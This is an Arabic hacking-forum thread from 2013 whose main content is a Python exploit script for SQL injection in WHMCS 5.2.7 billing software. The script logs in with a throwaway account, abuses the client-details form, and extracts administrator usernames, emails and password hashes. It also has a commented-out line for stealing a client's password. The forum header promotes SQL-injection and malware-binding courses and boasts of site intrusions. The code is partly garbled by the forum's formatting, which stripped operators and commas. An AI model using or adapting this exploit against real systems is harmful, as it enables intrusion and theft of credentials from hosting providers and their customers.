1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

WHMCS 5.2.7 SQL Injection

الموضوع في '[ الـثـغـرات ]' بواسطة ABOJANA IRAQY, بتاريخ ‏20 أكتوبر 2013.

كاتب الموضوع : ABOJANA IRAQY المشاهدات : 881 الردود : 1 ‏20 أكتوبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    ABOJANA IRAQY
    DeveloPer Plus

    عضو منذ:
    ‏10 مايو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    74
    نقاط الجائزة:

    WHMCS 5.2.7 SQL Injection



    [YOUTUBE]4YB-4IA8lUc[/YOUTUBE]

    كود PHP:
    #!/usr/bin/env python
    # 2013/10/03 - WHMCS 5.2.7 SQL Injection
    # http://localhost.re/p/whmcs-527-vulnerability

    url 'http://clients.target.com/' # wopsie dopsie
    user_email 'mysuper@hacker.account' # just create a dummie account at /iq-register.php
    user_pwd 'hacker'

    import urllibresys
    from urllib2 import Request
    urlopen
    ua 
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
    Safari/537.36"

    def exploit(sql):
    print 
    "Doing stuff: %s" sql
    urlopen(Request('%sclientarea.php?action=details' url,
    data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid
    =0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Ch
    anges" 
    % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' sqluser_email), headers={"User-agent"ua,
    "Cookie"user[0]})).read()
    return 
    re.search(r'(id="firstname" value="(.*?)")'r).group(2)

    def login():
    print 
    "Getting CSRF token"
    urlopen(Request('%slogin.php' urlheaders={"User-agent"ua}))
    csrf re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
    r.read()).group(2)
    cookie r.info()['set-cookie'].split(';')[0]
    print 
    "Logging in"
    urlopen(Request('%sdologin.php' urldata="username=%s&password=%s&token=%s" %(user_email,
    user_pwdcsrf), headers={"User-agent"ua"Cookie"cookie})).read()
    if 
    'dologin.php' in r:
    sys.exit('Unable to login')
    else:
    return [
    cookiere.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
    r).group(2)]

    user login()
    print 
    exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)'# get
    admins
    print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)'# just get a count of clients

    # oh you want to be evil
    #exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as
    x)#" % user_email)
     


    جاري تحميل الصفحة...
  2. غير متصل

    вαиɒєя
    DeveloPer Plus

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    طآلب
    الإقامة:

    رد: WHMCS 5.2.7 SQL Injection

    لاهنت يابطل تحياتي
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...